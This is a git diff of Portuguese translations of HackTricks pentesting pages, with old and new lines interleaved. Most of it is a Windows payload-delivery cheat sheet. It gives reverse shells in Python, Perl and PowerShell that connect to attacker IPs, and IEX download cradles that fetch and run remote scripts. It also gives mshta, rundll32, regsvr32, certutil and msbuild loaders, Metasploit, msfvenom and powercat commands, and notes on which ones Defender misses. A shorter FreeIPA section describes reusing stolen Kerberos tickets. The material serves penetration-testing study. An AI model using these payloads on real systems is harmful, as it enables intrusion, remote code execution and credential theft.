C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
```
## Perl
Perl é uma linguagem de programação amplamente utilizada em hacking e pentesting devido à sua capacidade de executar comandos do sistema operacional e interagir com arquivos de forma eficiente. É comum ver scripts Perl sendo usados para criar backdoors e shells em sistemas Windows comprometidos.
```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
@ -78,43 +80,43 @@ Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadStr
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
Processo realizando chamada de rede: **powershell.exe**\
Payload escrito no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando procmon!_)
Carga gravada no disco: **NÃO** (_pelo menos em nenhum lugar que eu pudesse encontrar usando o procmon!_)
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Chamada de rede realizada pelo processo: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
**Uma linha:**
Processo realizando chamada de rede: **svchost.exe**\
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Obtenha mais informações sobre diferentes Powershell Shells no final deste documento**
**Obtenha mais informações sobre diferentes Shells do Powershell no final deste documento**
## Mshta
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
Processo realizando chamada de rede: **mshta.exe**\
Carga útil escrita no disco: **Cache local do IE**
Carga útil escrita no disco: **cache local do IE**
```bash
mshta http://webserver/payload.hta
```
Processo realizando chamada de rede: **mshta.exe**\
Carga útil escrita no disco: **Cache local do IE**
Carga útil escrita no disco: **cache local do IE**
```bash
mshta \\webdavserver\folder\payload.hta
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Carga escrita no disco: **cache local do cliente WebDAV**
#### **Exemplo de shell reverso hta-psh (usar hta para baixar e executar backdoor PS)**
#### **Exemplo de shell reverso hta-psh (usa hta para baixar e executar backdoor PS)**
```markup
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Você pode baixar e executar facilmente um zumbi Koadic usando o stager hta**
**Você pode baixar e executar muito facilmente um zombie Koadic usando o stager hta**
#### exemplo hta
#### Exemplo hta
[**Daqui**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```markup
<html>
<head>
@ -129,9 +131,9 @@ new ActiveXObject('WScript.Shell').Run(c);
</body>
</html>
```
**Extraído de** [**aqui**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
#### **mshta - sct**
[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```markup
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -147,8 +149,6 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</script>
</scriptlet>
```
**Extraído de** [**aqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
#### **Mshta - Metasploit**
```bash
use exploit/windows/misc/hta_server
@ -164,21 +164,23 @@ Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given
## **Rundll32**
[**Exemplo de Dll hello world**](https://github.com/carterjones/hello-world-dll)
[**Exemplo de Dll olá mundo**](https://github.com/carterjones/hello-world-dll)
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
Processo realizando chamada de rede: **rundll32.exe**\
Payload escrito no disco: **Cache local do IE**
Carga gravada no disco: **cache local do IE**
**Detectado pelo defensor**
**Rundll32 - sct**
[**Daqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```bash
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -193,8 +195,6 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</script>
</scriptlet>
```
**Extraído de** [**aqui**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
#### **Rundll32 - Metasploit**
```bash
use windows/smb/smb_delivery
@ -215,16 +215,18 @@ rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject(
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
Processo realizando chamada de rede: **regsvr32.exe**\
Payload escrito no disco: **Cache local do IE**
Carga gravada no disco: **cache local do IE**
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
Processo realizando chamada de rede: **svchost.exe**\
Payload escrito no disco: **Cache local do cliente WebDAV**
Carga gravada no disco: **cache local do cliente WebDAV**
**Detectado pelo defender**
**Detectado pelo defensor**
#### Regsvr32 -sct
[**Daqui**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
@ -241,8 +243,6 @@ var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
</registration>
</scriptlet>
```
**Extraído de** [**aqui**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
#### **Regsvr32 - Metasploit**
```bash
use multi/script/web_delivery
@ -252,23 +252,24 @@ set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Você pode baixar e executar facilmente um zumbi Koadic usando o stager regsvr**
**Você pode baixar e executar facilmente um zombie Koadic usando o stager regsvr**
## Certutil
Baixe um B64dll, decodifique-o e execute-o.
Baixe um B64dll, decodifique e execute.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Baixe um B64exe, decodifique-o e execute-o.
Baixe um B64exe, decodifique e execute-o.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Detectado pelo defender**
**Detectado pelo defensor**
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder monitora sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, desde APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -289,7 +290,7 @@ msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > sh
\\webdavserver\folder\batchfile.bat
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Carga gravada no disco: **cache local do cliente WebDAV**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
@ -298,7 +299,7 @@ impacket-smbserver -smb2support kali `pwd`
```bash
\\10.8.0.3\kali\shell.bat
```
**Detectado pelo defender**
**Detectado pelo defensor**
## **MSIExec**
@ -318,9 +319,9 @@ victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
wmic os get /format:"https://webserver/payload.xsl"
```
Processo realizando chamada de rede: **wmic.exe**\
Payload escrito no disco: **Cache local do IE**
Carga gravada no disco: **cache local do IE**
Exemplo de arquivo xsl:
Exemplo de arquivo xsl [aqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
@ -332,8 +333,6 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
</ms:script>
</stylesheet>
```
Extraído de [aqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7)
**Não detectado**
**Você pode baixar e executar muito facilmente um zumbi Koadic usando o stager wmic**
@ -343,10 +342,10 @@ Extraído de [aqui](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Payload escrito no disco: **cache local do cliente WebDAV**
Você pode usar essa técnica para contornar a Lista de Permissões de Aplicativos e as restrições do Powershell.exe. Como resultado, será apresentado com um shell PS.\
Basta baixar isso e executar: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
Você pode usar essa técnica para burlar a Lista Branca de Aplicativos e as restrições do Powershell.exe. Pois você será solicitado com um shell do PS.\
Basta baixar e executar isso: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
@ -354,11 +353,11 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
## **CSC**
Compile código C# na máquina vítima.
Compilar código C# na máquina da vítima.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
Você pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
Pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Não detectado**
@ -367,9 +366,9 @@ Você pode baixar um shell reverso básico em C# aqui: [https://gist.github.com/
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Payload escrito no disco: **cache local do cliente WebDAV**
**Eu não tentei isso**
**Eu não tentei**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
@ -378,29 +377,29 @@ Carga útil escrita no disco: **Cache local do cliente WebDAV**
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
Processo realizando chamada de rede: **svchost.exe**\
Carga útil escrita no disco: **Cache local do cliente WebDAV**
Carga escrita no disco: **cache local do cliente WebDAV**
**Eu não tentei**
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
## Shells Powershell
## Shells do Powershell
### PS-Nishang
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
Na pasta **Shells**, existem vários tipos diferentes de shells. Para baixar e executar Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e acrescente ao final do arquivo:
Na pasta **Shells**, existem vários shells diferentes. Para baixar e executar o Invoke-_PowerShellTcp.ps1_ faça uma cópia do script e adicione ao final do arquivo:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Comece a servir o script em um servidor web e execute-o no lado da vítima:
Comece a servir o script em um servidor web e execute-o no final da vítima:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
O Defender não o detecta como código malicioso (ainda, 03/04/2019).
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
**TODO: Verificar outros shells nishang**
**TODO: Verificar outros shells do nishang**
### **PS-Powercat**
@ -410,11 +409,11 @@ Baixe, inicie um servidor web, inicie o ouvinte e execute no lado da vítima:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
O Defender não o detecta como código malicioso (ainda, 03/04/2019).
Defender ainda não o detecta como código malicioso (ainda, 3/04/2019).
**Outras opções oferecidas pelo powercat:**
Bind shells, Reverse shell (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
Conexão de shell, Shell reverso (TCP, UDP, DNS), Redirecionamento de porta, upload/download, Gerar payloads, Servir arquivos...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
@ -435,7 +434,7 @@ powercat -l -p 443 -i C:\inputfile -rep
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Crie um lançador powershell, salve-o em um arquivo e baixe e execute-o.
Crie um iniciador powershell, salve-o em um arquivo e faça o download e execute-o.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
@ -445,7 +444,7 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
Crie uma versão powershell de backdoor metasploit usando unicorn
Crie uma versão em powershell de uma backdoor do metasploit usando o unicorn
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
@ -453,7 +452,7 @@ Inicie o msfconsole com o recurso criado:
```
msfconsole -r unicorn.rc
```
Inicie um servidor web que disponibilize o arquivo _powershell\_attack.txt_ e execute na vítima:
Inicie um servidor web servindo o arquivo _powershell\_attack.txt_ e execute no alvo:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
@ -478,21 +477,21 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) Console PS com alguns módulos
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que mais importam para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

197
linux-hardening/freeipa-pentesting.md
View file

@ -1,122 +1,59 @@
# Pentesting FreeIPA
# Pentesting do FreeIPA
<details>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do GitHub** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
Esta informação foi retirada dos posts:
* [https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a](https://posts.specterops.io/attacking-freeipa-part-i-authentication-77e73d837d6a)
* [https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1](https://posts.specterops.io/attacking-freeipa-part-ii-enumeration-ad27224371e1)
* [https://www.youtube.com/watch?v=9dOu-7BTwPQ\&feature=youtu.be](https://www.youtube.com/watch?v=9dOu-7BTwPQ\&feature=youtu.be)
## Informações Básicas
É uma **alternativa** open source ao Microsoft Windows **Active Directory**, usada principalmente como uma solução integrada de gestão para ambientes **Unix**. Semelhante ao Active Directory, o FreeIPA implementa uma infraestrutura completa de **diretório LDAP** suportada por um MIT **Kerberos** Key Distribution Center. Utiliza o Dogtag **Certificate System** para gestão de certificados CA & RA, dando-lhe a capacidade de lidar com autenticação **multi-fator**, incluindo smartcards. O SSSD é usado para integrar o FreeIPA no processo padrão de autenticação Unix.
O FreeIPA é apresentado como uma **alternativa** de código aberto ao **Active Directory** da Microsoft e é utilizado principalmente em ambientes **Unix** para gerenciamento integrado. Possui um diretório LDAP completo suportado por um Centro de Distribuição de Chaves MIT **Kerberos**, semelhante ao Active Directory. O Sistema de Certificados Dogtag é utilizado para gerenciar certificados CA & RA, possibilitando capacidades de autenticação **multi-fator**, incluindo cartões inteligentes. Para integração ao processo de autenticação Unix, é utilizado o SSSD.
## Impressões Digitais
### Arquivos & Variáveis de Ambiente
### Arquivos e Variáveis de Ambiente
* **`/etc/krb5.conf`:** O arquivo `krb5.conf` contém as informações do cliente Kerberos necessárias para ser **inscrito no domínio**. Isso inclui as **localizações dos KDCs e servidores admin** para os reinos Kerberos de interesse, padrões para o reino atual e para aplicações Kerberos, e mapeamentos de hostnames para reinos Kerberos.
* **`/etc/ipa/default.conf`:** Este é o **arquivo de configuração padrão para servidores IPA**, é usado para definir padrões de sistema a serem aplicados ao executar clientes e servidores IPA.
* **`/etc/krb5.keytab`:** O arquivo `krb5.keytab` é **necessário** em todos os hosts dentro do **domínio**. É necessário como parte do processo de **autenticação** para o KDC.
* **`KRB5CCNAME`:** Se definido, esta variável aponta para a **localização do CCACHE Ticket** a ser usado para autenticação.
* **`KRB5_KTNAME`:** Se definido, esta variável aponta para a **localização** do arquivo **Keytab** a ser usado para autenticação.
* **`KRB5_CONFIG`:** Se definido, esta variável aponta para a **localização** do arquivo de **configuração Kerberos**.
* **`KRB5_KDC_PROFILE`:** Se definido, esta variável aponta para a **localização do arquivo de configuração do KDC**, que contém diretivas adicionais de configuração para o daemon do Key Distribution Center.
* **`KRB5RCACHETYPE`:** Esta variável especifica o **tipo padrão de cache de replay** a ser usado pelos servidores.
* **`KRB5RCACHEDIR`:** Esta variável especifica o **diretório padrão para caches de replay** usados pelos servidores.
* **`KRB5_TRACE`:** Esta variável especifica um **nome de arquivo para escrever a saída do log de rastreamento**. Logs de rastreamento podem ajudar a esclarecer decisões feitas internamente pelas bibliotecas Kerberos.
* **`KRB5_CLIENT_KTNAME`:** Esta variável define o nome do arquivo **keytab do cliente padrão**.
* **`KPROP_PORT`:** Esta variável define a **porta padrão para o kprop** usar.
- O arquivo em `/etc/krb5.conf` é onde as informações do cliente Kerberos, necessárias para a inscrição no domínio, são armazenadas. Isso inclui as localizações dos KDCs e servidores de administração, configurações padrão e mapeamentos.
- As configurações padrão do sistema para clientes e servidores IPA são definidas no arquivo localizado em `/etc/ipa/default.conf`.
- Os hosts dentro do domínio devem ter um arquivo `krb5.keytab` em `/etc/krb5.keytab` para processos de autenticação.
- Várias variáveis de ambiente (`KRB5CCNAME`, `KRB5_KTNAME`, `KRB5_CONFIG`, `KRB5_KDC_PROFILE`, `KRB5RCACHETYPE`, `KRB5RCACHEDIR`, `KRB5_TRACE`, `KRB5_CLIENT_KTNAME`, `KPROP_PORT`) são usadas para apontar para arquivos específicos e configurações relevantes à autenticação Kerberos.
### Binários
* **ipa:** Este binário é o padrão para **gerenciar um domínio FreeIPA**. Pode ser usado para gerenciar hosts, usuários, regras sudo e muito mais.
* **kdestroy:** O binário kdestroy é usado para **destruir** quaisquer **tickets Kerberos** atuais na sessão do usuário.
* **kinit:** O binário kinit é usado para **estabelecer**, ou **renovar tickets Kerberos**.
* **klist:** O binário klist **lista** quaisquer **tickets Kerberos em uso** atualmente, e quais principais os tickets fornecem acesso.
* **kpasswd:** O comando kpasswd é usado para **mudar a senha de um principal Kerberos**. kpasswd primeiro solicita a senha Kerberos atual, depois pede ao usuário duas vezes pela nova senha, e a senha é alterada.
* **ksu:** Ksu pode ser usado como uma **alternativa ao binário su**, para mudar o **contexto do usuário atual**.
* **kswitch:** O comando kswitch irá **trocar** o **cache de credenciais em uso** atualmente.
* **kvno:** O binário kvno adquire um **ticket de serviço** para os **principais Kerberos especificados** e imprime os números de versão das chaves de cada um.
Ferramentas como `ipa`, `kdestroy`, `kinit`, `klist`, `kpasswd`, `ksu`, `kswitch` e `kvno` são essenciais para gerenciar domínios FreeIPA, lidar com tickets Kerberos, alterar senhas e adquirir tickets de serviço, entre outras funcionalidades.
### Rede
É assim que um servidor FreeIPA pode parecer:
<figure><img src="../.gitbook/assets/image (197).png" alt=""><figcaption></figcaption></figure>
Uma ilustração é fornecida para representar uma configuração típica de servidor FreeIPA.
## Autenticação
Como o FreeIPA usa **Kerberos para autenticação**, esse processo é muito semelhante à **autenticação** no **Active Directory**. Para **acessar** recursos no domínio, um usuário deve ter um **ticket Kerberos válido** para esse recurso. Esses tickets podem ser armazenados em vários locais diferentes com base na configuração do domínio FreeIPA.
A autenticação no FreeIPA, utilizando **Kerberos**, espelha a do **Active Directory**. O acesso a recursos do domínio requer um ticket Kerberos válido, que pode ser armazenado em vários locais, dependendo da configuração do domínio FreeIPA.
### **Arquivos de Ticket CCACHE**
### Arquivos de Ticket CCACHE
Quando os tickets são configurados para serem **armazenados** como um **arquivo** em **disco**, o formato e tipo padrão é um arquivo **CCACHE**. Este é um formato de arquivo binário simples para armazenar credenciais Kerberos. Esses arquivos são normalmente armazenados em **`/tmp`** e configurados com permissões **600**. Do ponto de vista de um atacante, isso é importante pelas seguintes razões:
Os arquivos CCACHE, armazenados tipicamente em **`/tmp`** com permissões **600**, são formatos binários para armazenar credenciais Kerberos, importantes para autenticação sem a senha em texto simples do usuário devido à sua portabilidade. Analisar um ticket CCACHE pode ser feito usando o comando `klist`, e reutilizar um Ticket CCACHE válido envolve exportar `KRB5CCNAME` para o caminho do arquivo de ticket.
1. Tickets válidos podem ser **utilizados para autenticar**, **sem** a necessidade da **senha** em texto simples do respectivo usuário.
2. Tickets **CCACHE** são altamente **portáteis**. Eles podem ser baixados e carregados em outro host sem a necessidade de renovar ou validar o ticket.
